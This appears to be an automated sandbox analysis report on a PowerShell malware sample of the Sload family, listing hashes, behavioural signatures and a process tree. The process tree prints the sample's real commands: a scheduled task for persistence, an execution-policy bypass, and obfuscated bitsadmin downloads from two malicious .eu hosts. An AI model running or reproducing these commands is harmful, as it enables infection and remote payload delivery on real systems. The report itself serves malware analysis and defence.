Analysis
-
max time kernel
94s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2024 13:49
Static task
static1
Behavioral task
behavioral1
Sample
FILE POWERSHELL MALEVOLO.ps1
Resource
win7-20241010-en
General
-
Target
FILE POWERSHELL MALEVOLO.ps1
-
Size
104KB
-
MD5
ef3e1a843da4fb31012afe474447c98b
-
SHA1
0ca2a653b3cc7d8630e2938c18ce5dda91e0b9b7
-
SHA256
488d775b3e2118b63dfc26020e5e7a3aa95951f78099ce8e203d50b3e1e0c66d
-
SHA512
149744665463591cea2798f4efd90b7d5b24c763270e8530c40b7520892b67b0f92b0268456eaa5c545a1984cddca45dddb4e0461c72eee0b3f8db9592f1ec55
-
SSDEEP
3072:ZtW7qBQqhDmaA8Hch3g+XdZQaPU91ajO3vQSo:gqBQqhDmaA8HW3g+XdZQaPU91ajO3vQH
Malware Config
Signatures
-
Sload family
-
Download via BitsAdmin 1 TTPs 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.EXEdescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation wscript.EXE -
Processes:
powershell.exepowershell.exepid process 3464 powershell.exe 3852 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exepid process 3464 powershell.exe 3464 powershell.exe 3464 powershell.exe 3852 powershell.exe 3852 powershell.exe 3852 powershell.exe 3852 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3464 powershell.exe Token: SeDebugPrivilege 3852 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
powershell.execmd.exewscript.EXEpowershell.execmd.execmd.execmd.exedescription pid process target process PID 3464 wrote to memory of 552 3464 powershell.exe schtasks.exe PID 3464 wrote to memory of 552 3464 powershell.exe schtasks.exe PID 3464 wrote to memory of 1488 3464 powershell.exe schtasks.exe PID 3464 wrote to memory of 1488 3464 powershell.exe schtasks.exe PID 3464 wrote to memory of 4304 3464 powershell.exe cmd.exe PID 3464 wrote to memory of 4304 3464 powershell.exe cmd.exe PID 4304 wrote to memory of 4088 4304 cmd.exe schtasks.exe PID 4304 wrote to memory of 4088 4304 cmd.exe schtasks.exe PID 3348 wrote to memory of 3852 3348 wscript.EXE powershell.exe PID 3348 wrote to memory of 3852 3348 wscript.EXE powershell.exe PID 3852 wrote to memory of 1592 3852 powershell.exe getmac.exe PID 3852 wrote to memory of 1592 3852 powershell.exe getmac.exe PID 3852 wrote to memory of 3664 3852 powershell.exe cmd.exe PID 3852 wrote to memory of 3664 3852 powershell.exe cmd.exe PID 3852 wrote to memory of 4548 3852 powershell.exe cmd.exe PID 3852 wrote to memory of 4548 3852 powershell.exe cmd.exe PID 3852 wrote to memory of 1368 3852 powershell.exe cmd.exe PID 3852 wrote to memory of 1368 3852 powershell.exe cmd.exe PID 3664 wrote to memory of 856 3664 cmd.exe bitsadmin.exe PID 3664 wrote to memory of 856 3664 cmd.exe bitsadmin.exe PID 1368 wrote to memory of 4872 1368 cmd.exe bitsadmin.exe PID 1368 wrote to memory of 4872 1368 cmd.exe bitsadmin.exe PID 4548 wrote to memory of 4464 4548 cmd.exe bitsadmin.exe PID 4548 wrote to memory of 4464 4548 cmd.exe bitsadmin.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\FILE POWERSHELL MALEVOLO.ps1"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3464 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /FO CSV /v2⤵PID:552
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /change /tn GoFast /disable2⤵PID:1488
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /C schtasks /F /%windir:~0,1%reate /sc minute /mo 3 /TN "S0gzhMyNWIs" /ST 07:00 /TR "wscript /E:vbscript c:\users\Admin\AppData\Roaming\\gzhMyNWIs\WQkUpeNb.tmp"2⤵
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Windows\system32\schtasks.exeschtasks /F /Create /sc minute /mo 3 /TN "S0gzhMyNWIs" /ST 07:00 /TR "wscript /E:vbscript c:\users\Admin\AppData\Roaming\\gzhMyNWIs\WQkUpeNb.tmp"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4088
-
-
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE /E:vbscript c:\users\Admin\AppData\Roaming\\gzhMyNWIs\WQkUpeNb.tmp1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3348 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -file WQkUpeNb.ps12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\system32\getmac.exe"C:\Windows\system32\getmac.exe" /fo table3⤵PID:1592
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /C bitsadmin /reset3⤵
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Windows\system32\bitsadmin.exebitsadmin /reset4⤵PID:856
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /C bitsadmin /transfer hRAuzxNa /%windir:~6,1%ownload /priority FOREGROUND "https://uyiuwbn.eu/topic//main.php?ch=1&i=908b7aaf4d4c5ad48895e6b1007aa7d5" C:\users\Admin\AppData\Roaming\gzhMyNWIs\0_svchost.log3⤵
- Suspicious use of WriteProcessMemory
PID:4548 -
C:\Windows\system32\bitsadmin.exebitsadmin /transfer hRAuzxNa /download /priority FOREGROUND "https://uyiuwbn.eu/topic//main.php?ch=1&i=908b7aaf4d4c5ad48895e6b1007aa7d5" C:\users\Admin\AppData\Roaming\gzhMyNWIs\0_svchost.log4⤵
- Download via BitsAdmin
PID:4464
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /C bitsadmin /transfer KJbPvAsU /%windir:~6,1%ownload /priority FOREGROUND "https://uognbcg.eu/topic//main.php?ch=1&i=908b7aaf4d4c5ad48895e6b1007aa7d5" C:\users\Admin\AppData\Roaming\gzhMyNWIs\1_svchost.log3⤵
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\system32\bitsadmin.exebitsadmin /transfer KJbPvAsU /download /priority FOREGROUND "https://uognbcg.eu/topic//main.php?ch=1&i=908b7aaf4d4c5ad48895e6b1007aa7d5" C:\users\Admin\AppData\Roaming\gzhMyNWIs\1_svchost.log4⤵
- Download via BitsAdmin
PID:4872
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD59c96f3f560075017255edbe64c3dde87
SHA19d14f7cfa180a50eddaa7bffbd01f996df22eaec
SHA2566f4e8ce8fb4f2cb84c898821781b9a1a6f290a74732e72bb0c6f29c0e2b21d35
SHA5123f695264b07f033a46e164823220711286951896ee08db51ef9df3c0ab5db4a5a6d0ca87c02c6da7f669088d53c7888c8265b5cae3f991566da078de6d1bf403
-
Filesize
160KB
MD5911c95cef0824a684d2479804eb8cf19
SHA1b72c5d8b9f0eafe0da129feedf162e479a3e1718
SHA2560d3caf29e9098f00ef0e6f76e9426ed49bdfd8961b6128a3bf3b0274cc6b1c1b
SHA512bfd8c85700db69c261d0676bfa8199eb3f079c089364ea7f734f85e5fae103347ceb74fc29c23ae59803cc3878298853b8d653fa1d6cac5ed53302b9b03b835a
-
Filesize
1KB
MD5f3e4808ac14e8e115363902a0cbbdb6d
SHA1a984a9abfdae900df5733d3c51627afccbbd5201
SHA2562e77398371a5d0f40bcc5702220c964ea06595d2af3e166d16e49203ba5d1aaf
SHA512c79fb71bd3a4b5f62b1d3d50c6da91057510b2ecf4014bf569f4efe80e2d4ff5280aafd538cbf740feacb18802ed14806248bf6178a53cdb325fb93d98f89de0
-
Filesize
1KB
MD52dbb8b831ac3e2ddb2a9ab33d6c65902
SHA13d100e31185f2cdbcd39e68bbb3343d118e938f7
SHA2564bb2469553a01718de03515b6b80db6a07cea810a0f24eac4d4ed3bff9426679
SHA5122a3a9105feecbd60371bee177f615ee8044d04247f835779acaf7a4170e71da9f42b8932f2dd11cf70fc4f52bc013d9110fd0d8740bfe873b23d9dd427a8eeb3